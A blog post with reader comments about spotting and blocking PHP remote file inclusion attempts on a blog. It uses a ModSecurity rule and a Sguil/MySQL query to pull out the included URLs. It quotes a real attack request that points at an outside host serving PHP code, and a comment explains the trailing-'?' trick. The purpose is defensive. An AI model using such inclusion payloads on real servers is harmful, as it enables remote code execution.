Running a PHP based blog, I see a lot of attempts to include code hosted elsewhere in requests. A long time ago I added a simple rule to block one type of the these attempts. A typical attempt looks like this:
GET /blog/category/index.php?page=http://www.djrady.ru/includes/conf.txt?? HTTP/1.1
Notice the trailing questionmarks? Turns out these are always present, so very easy to block on. I’m doing that for a long time now, never seen a single false positive. The rule looks like this:
SecRule ARGS:/.*/ “https?.*?$” “msg:’LOCAL PHP ? link code inclusion attempt’,severity:1,phase:1”
This rule looks at all request args, and checks if their value contains http or https and if it ends with a questionmark. If so, the request is blocked.
Today I was thinking that the URI’s that are included probably contain some badness, and it would be interesting to look what all the URI’s are. Using modsec2sguil I’m adding all ModSecurity events to Sguil, so this was going to be an interesting MySQL challenge!
The query I came up with is this:
SELECT COUNT(*) AS cnt, INET_NTOA(src_ip) AS “Source IP”, trim(LEADING “=” FROM substring_index(substr(unhex(data_payload),locate(‘=http’,unhex(data_payload))), ‘?’, 1)) AS url FROM event INNER JOIN data ON event.sid = data.sid and event.cid = data.cid WHERE (timestamp >= ‘2009-01-13’ AND signature LIKE “MSc 403 LOCAL PHP ?%”) GROUP BY src_ip,url ORDER BY cnt DESC LIMIT 10;
The result is here (click here for full picture):
I get about 10 url’s like this a day, usually they are tried more than once. So what is at these links? The first one gave a 404, so let’s look at the second one. It’s a jpg, thats a picture right? Wrong!
I downloaded the file and opened it in vim. As you can see in this fragment, this is php code…
Anyone know if there is some place I can report these url’s to on a daily/weekly basis?
Inliniac 
Nice post, Victor.
You can report the sites to Google: http://www.google.com/safebrowsing/report_badware/
OpenDNS has domain tagging, but it does not appear to include malicious sites. The closest thing I see is an ‘adware’ tag: http://www.opendns.com/community/domaintagging/about/
Pingback: Extracting bad url’s from ModSecurity events in Sguil | PHP-Blog.com
I have added this to my list of ModSecurity rules at http://www.xiom.com/signatures-modsecurity. Do you known why does the URL ends with a “?”
Ofer said – Do you known why does the URL ends with a “?”
It is a technique somewhat similar to SQL Injection payloads utilizing comment specifiers (– or ;– or #) at the end of their payloads. The RFI attackers do not know what the remainder of the PHP code that they are going to be included into is supposed to do. So, by adding the “?” character, the remainder of the local server PHP code is actually treated as a parameter to the RFI included code. The injected RFI PHP code simply ignores the parameter data so it will only execute its own code.
Thanks for that explanation Ryan. Do you see any danger for false positives when blocking request URI’s ending in a “?”. On my WordPress blog I’ve not seen any FP so far…
Thanks for the very useful information. Do you know why the URL ends with a “?”
@Adam, see Ryan Barnett’s explanation above!
I have a question becase i don’t understand:
SecRule ARGS:/.*/ “https?.*?$” “msg:’LOCAL PHP ? link code inclusion attempt’,severity:1,phase:1″
As above method, why don’t you use “http?.*?$” instead of “https?.*?$”
Non-letter “s” and had letter “s”
@sorry, my english not good
The s? in https? means that it will match on http or https. In your example it would match on htt or http.